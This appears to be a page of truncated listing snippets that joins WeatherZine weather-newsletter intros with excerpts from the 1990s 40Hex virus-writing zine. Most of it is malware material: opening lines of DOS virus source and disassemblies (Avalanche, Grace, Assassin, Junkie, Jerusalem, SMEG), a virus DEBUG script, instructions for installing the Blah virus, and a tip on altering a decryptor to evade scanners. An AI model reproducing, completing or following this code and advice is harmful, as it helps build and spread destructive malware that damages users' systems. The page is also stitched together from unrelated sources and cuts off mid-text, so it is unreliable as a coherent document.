WeatherZine #29 Number 29, August 2001 "What's happening on the Societal Aspects of Weather WWW Site." WeatherZine is a bi-monthly on-line and e-mail distribution newsletter for the Societal Aspects of Weather Site. It contains a summary of recent changes to the site (along with links to relevant sections), and news, events, and announcements of interest to the community. WeatherZine, and its parent WWW site, accept and encourage the submission of activities, events, or links of interest to the community. You can use the on-line forms in the Feedback section or can send an email to thunder@ucar.edu with the item you would like to see ...

WeatherZine #28 Number 28, June 2001 "What's happening on the Societal Aspects of Weather WWW Site." WeatherZine is a bi-monthly on-line and e-mail distribution newsletter for the Societal Aspects of Weather Site. It contains a summary of recent changes to the site (along with links to relevant sections), and news, events, and announcements of interest to the community. WeatherZine, and its parent WWW site, accept and encourage the submission of activities, events, or links of interest to the community. You can use the on-line forms in the Feedback section or can send an email to thunder@ucar.edu with the item you would like to see po...

WeatherZine #27 Number 27, April 2001 "What's happening on the Societal Aspects of Weather WWW Site." WeatherZine is a bi-monthly on-line and e-mail distribution newsletter for the Societal Aspects of Weather Site. It contains a summary of recent changes to the site (along with links to relevant sections), and news, events, and announcements of interest to the community. WeatherZine, and its parent WWW site, accept and encourage the submission of activities, events, or links of interest to the community. You can use the on-line forms in the Feedback section or can send an email to thunder@ucar.edu with the item you would like to see p...

WeatherZine #26 Number 26, February 2001 "What's happening on the Societal Aspects of Weather WWW Site." WeatherZine is a bi-monthly on-line and e-mail distribution newsletter for the Societal Aspects of Weather Site. It contains a summary of recent changes to the site (along with links to relevant sections), and news, events, and announcements of interest to the community. WeatherZine, and its parent WWW site, accept and encourage the submission of activities, events, or links of interest to the community. You can use the on-line forms in the Feedback section or can send an email to thunder@ucar.edu with the item you would like to se...

WeatherZine #25 Number 25, December 2000 "What's happening on the Societal Aspects of Weather WWW Site." WeatherZine is a bi-monthly on-line and e-mail distribution newsletter for the Societal Aspects of Weather Site. It contains a summary of recent changes to the site (along with links to relevant sections), and news, events, and announcements of interest to the community. WeatherZine, and its parent WWW site, accept and encourage the submission of activities, events, or links of interest to the community. You can use the on-line forms in the Feedback section or can send an email to thunder@ucar.edu with the item you would like to se...

40Hex Number 14 Volume 5 Issue 1 File 013 ;**************************************************************************** ;* Resident stealth infector 'AVALANCHE' * ;* written by Metal Junkie in 1994/95 * ;**************************************************************************** ; 100% memory stealth ; Int 21h Tunneling ; Retro functions ; EXE/COM - Infection ; and many other features. Enjoy it! ; Disclaimer: Warning! This source contains destructive code. Do not compile ; it! The author is not responsible for any damage caused by this code. ; And last but not least, greetings to Neurobasher,Stormbringer, the guys ; of VLAD (hi ...

40Hex Number 14 Volume 5 Issue 1 File 012 UMB Residency By Dark Angel, Phalcon/Skism '95 One day, while fiddling with loading programs into MSDOS UMB's, I realised that there are very few viruses that used UMB's. This is surprising, given the prevalence of UMB's and the ease with which DOS viruses may hide their presence through the use of UMB's. The UMB's, or upper memory blocks, consist of the memory above 640K and below 1MB (segments A000 to FFFF). This region was reserved early on for BIOS and peripherals, notably video memory. There is normally plenty of unused space in this region, so enterprising programmers found a simple way...

40Hex Number 14 Volume 5 Issue 1 File 011 The following is a DEBUG script for my old JUMP virus, written sometime in the summer of '94 or so I think. I had gotten bored as hell, and couldn't think of much that hadn't been done with viruses, so I came up with this thing.... anyway, I didn't make it the typical "e 100 xx xx" type debug script, 'cause I wanted people to be able to see how it got its name. It can be reassembled the same as any debug script, just debug <jump.scr. Aside from its most obvious trait, it is a memory resident appending .com infector. -Stormbringer ------------------------- cut here for jump.scr ---------------...

40Hex Number 14 Volume 5 Issue 1 File 010 comment % Dear Virus Friends, dis is so far my latest production. It is a polymorphic virus that uses some stealth techniques. After execution of infected file, it goes memory-resident and hits com'n'exe on execution or creation. There are two interesting features to this. First it is the polymorphic engine that generates two-phase decrypting routine. First phase consists of various instructions, among them some decrypt phase two. Phase two is a regular cyclical decryptor. (By altering phase two you probably can avoid detection by the virus scanners.) Second feature is demobilising of resident vi...

40Hex Number 14 Volume 5 Issue 1 File 009 ;============================================================================== ; ; Grace ; ; Mid-file COM/EXE TSR infector, 1294 bytes ; ; This virus employs a brand new infection mechanism such that virus ; scanners which only check the entry points will fail. ie. heuristics ; are (so far) worthless against this virus. However this opens the virus ; up to signature scanning vulnerability because the entry point code ; is fixed and very specific. The next version of this virus will feature ; a general architectural reconstruction, multiple-block displacement ; and also polymorphism, so keep ...

40Hex Number 14 Volume 5 Issue 1 File 008 A lot of you saw the letter I posted in alt.comp.virus..... I thought I might explain it now that I am sober ;) I did write the letter, and a.) I was drunk as hell, and b.) I keep my word and have stopped writing viruses. If you didn't read it, well, basically some schmuck (who I found out later wrote friggin' ANSI bombs.... you go girl!) in Singapore got infected with KeyKapture 2, and wrote me email about it. I was drunk when I got it, got real depressed, etc. etc.... Anyway, I don't support infecting the public with viruses, especially destructive ones, and never have (WTF is the point of doin...

40Hex Number 14 Volume 5 Issue 1 File 007 Virus Spotlight: 3APA3A (ZARAZA) This is a new virus which has come out of Russia. It has received a lot of publicity in the virus and anti-virus communities due to the unusual manner in which it infects. The following article, written by Igor G. Muttik, is a good description of the virus. A disassembly of the virus follows this text. Dark Angel Phalcon/Skism '95 --------------------------------- 3APA3A virus -- the first kernel infector. ========================================== Igor G. Muttik Low Temperature Physics Laboratory, Physics Department, Moscow State University, 117234, Russia Ph...

40Hex Number 14 Volume 5 Issue 1 File 006 Junkie virus The Junkie virus is an unremarkable boot sector/COM infector that has been making the rounds recently. There isn't really that much to say about it, except that it sports a lot of poor coding that manages to somehow work despite its shortcomings. Dark Angel Phalcon/Skism --------------------------- .model tiny .code .radix 16 org 0 ; Junkie virus ; Disassembly by Dark Angel of Phalcon/Skism for 40Hex #14 Vol 5 Iss 1 ; Byte for byte match when assembled with TASM 2.5 ; To assemble, do the following: ; tasm /m junkie.asm ; tlink junkie.obj ; exe2bin junkie.exe junkie.co...

40Hex Number 14 Volume 5 Issue 1 File 005 The Blah virus is a memory-resident, stealth, multipartite partition table/ batch file virus. What follows is the raw source file. After the source file is a batch file infected with Blah which demonstrates the workings of the virus. To install the virus, simply run this batch file. Or you can assemble the source, run the output file, and then execute a batch file. Be cautious when running this virus, however, since it immediately infects the partition table and your hard drive will become unavailable should you boot from diskette. You have been warned! comment ~ The Blah virus The world's on...

40Hex Number 14 Volume 5 Issue 1 File 004 ; Assassin (Bug Fix version) ; by Dark Slayer mem_size equ offset memory_end-offset start mem_para equ (mem_size+0fh)/10h low_mem_size equ mem_size+100h low_mem_para equ (low_mem_size+0fh)/10h vir_size equ offset vir_end-offset start vir_sector equ (vir_size+1ffh+2)/200h constant_size equ offset constant-offset start .model tiny .code org 0 start: xor di,di mov dx,ds:[di+2] sub dh,5 mov ah,26h int 21h mov bp,ds:[di+2ch] mov ah,4ah mov bx,low_mem_para int 21h mov ah,52h int 21h mov bx,es:[bx-2] mov ax,cs dec ax mcb: mov cx,ds mov ds,bx inc bx mov dx,bx add bx,ds:[di+3] or bp,bp jnz not...

40Hex Number 14 Volume 5 Issue 1 File 003 Boot Infectors By Dark Angel of Phalcon/Skism As most of our readers have no doubt noticed, 40Hex articles have traditionally covered file based viruses. It is time to fill in the hole and cover the other large class of viruses, the partition table and boot sector viruses, herein termed "boot infectors" for brevity. File based viruses are executed after the operating system loads. Boot infectors, however, latch onto the parts of the drive that are accessed by the BIOS when it attempts to load the operating system itself. Therefore, there is little that can be done to intercept the boot infect...

40Hex Number 14 Volume 5 Issue 1 File 002 KILLSMEG (c) 1994 by Stormbringer of Phalcon/Skism Note: This is an update to an earlier program, KILLQUEEG, which misfired badly when it encountered SMEG.Pathogen, as Pathogen is functionally almost IDENTICAL to Queeg and would scan the same in the old program, but become a disaster on disinfection. KILLSMEG will scan and disinfect both correctly, as well as most new variants. Variants that it is not likely to be able to disinfect it will report as a new variant of SMEG. DISCLAIMER: Author assumes NO liabilities for any damage this software might cause. It is not guaraunteed in any way. I ha...

40Hex Number 14 Volume 5 Issue 1 File 001 SMEG is one of those ubiquitous polymorphism aids which have become fashionable during the last few years. It was written by the Black Baron of England. It tends to generate rather large decryptors. The only really interesting feature is that it has the capability of generating CALL's to garbage subroutines. Note that there are only a few routines which SMEG chooses from, so this encryption is more on the level of Whale coupled with garbling. The debug script follows the disassembly. Dark Angel Phalcon/Skism 1995 ------------------------------- ; This is the disassembly of a SMEG demonstratio...

40Hex Number 14 Volume 5 Issue 1 File 000 Wow, another release of 40hex. Bet you thought we were dead. Wrong. Lots of stuff has happened since the last issue of 40hex. The most important thing to note is that my apartment burned down back in November. I lost pretty much everything, but miraculously, my 386/33 and the 8 megs of ram inside it survived a BIG fire, the water hose, then being thrown out of a 3 story window. All of the information I had was destroyed however. The next thing I would like to mention is the Wired Article that appeared about PHALCON/SKISM. It sucked. Besides the fact that I was called the "Official Archivi...

40Hex Number 13 Volume 4 Issue 1 File 008 .model tiny .code org 0 ; Jerusalem (Standard) ; Disassembly by Dark Angel of Phalcon/Skism viruslength = (endjerusalem - jerusalem) jerusalem: jmp enter_jerusalem db 'sU' marker db 'MsDos' COMdest dw 0, 0 activate_flag db 0 zero dw 0 filesize dw 3 oldint8 dw 0, 0 oldint21 dw 0, 0 oldint24 dw 0, 0 int8counter dw 0 tempheader dw 0 EXEdest dw 0,0 _initialSP dw 0 _initialSS dw 0 _headersize dw 0 _filelengthlo dw 0 _filelengthhi dw 0 savePSP1 dw 0 respara dw 80h parmblock: dw 0 ; use current environment dw 80h savePSP2 dw 0 ; pointer to command line dw 5Ch savePSP3 dw 0 ; pointer to 1st FCB dw 6C...